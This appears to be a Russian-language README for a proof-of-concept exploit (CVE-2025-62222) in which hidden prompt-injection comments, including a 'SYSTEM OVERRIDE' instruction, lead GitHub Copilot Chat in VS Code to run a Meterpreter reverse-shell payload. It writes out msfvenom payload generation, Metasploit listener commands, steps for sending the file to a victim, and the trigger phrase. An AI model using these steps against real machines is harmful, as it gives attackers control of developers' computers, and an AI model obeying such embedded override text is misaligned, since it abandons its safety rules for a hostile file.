
Эксплойт для подтверждения концепции уязвимости CVE-2025-62222, демонстрирующий удаленное выполнение кода через инъекцию запросов в GitHub Copilot Chat для VS Code, с генерацией полезной нагрузки Metasploit и настройкой прослушивателя обратной оболочки.
Этот репозиторий содержит Доказательство концепции (PoC) для уязвимости CVE-2025-62222. Он демонстрирует, как можно добиться удаленного выполнения кода (RCE) на машине разработчика, манипулируя контекстом GitHub Copilot Chat в VS Code с помощью скрытой инъекции промпта в комментариях.
ТОЛЬКО В ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЯХ.
Этот код предоставляется исключительно в образовательных и этических исследовательских целях. Автор не несет ответственности за неправомерное использование этой информации. Не используйте это в системах без явного разрешения.
Перед отправкой файла жертве (или локальным тестированием) вы должны сгенерировать полезную нагрузку и оставить сервер прослушивающим.
Сгенерируйте вредоносную команду PowerShell. Убедитесь, что вы настроили свой IP (LHOST) и порт (LPORT).
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TU_IP> LPORT=<TU_PUERTO> -f psh-cmd
Критическая инструкция: Скопируйте код, сгенерированный этой командой. Откройте файл copilot_injection_poc.py из этого репозитория и замените раздел, где написано TOKEN (или всю строку команды PowerShell внутри комментария), на только что сгенерированный код.
В терминале атакующего запустите Metasploit для приема обратного соединения:
msfconsole -q
Оказавшись внутри консоли msf6 >, выполните следующие команды для подготовки прослушивания:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <TU_IP_ATACANTE>
set LPORT 4444
exploit
(Убедитесь, что LPORT совпадает с использованным в шаге 1, а LHOST — ваш IP).
Для срабатывания уязвимости выполните следующие шаги на машине с VS Code и установленным расширением GitHub Copilot Chat:
copilot_injection_poc.py в редакторе, чтобы Copilot имел его в активном контексте (должен быть виден на вкладке).Configura el entorno desde la terminal sin omitir ni modificar nada del código
Из-за скрытой инструкции "SYSTEM OVERRIDE" в комментариях Python-скрипта Copilot будет подчиняться вредоносному файлу вместо своих собственных правил безопасности.
Для получения дополнительной информации: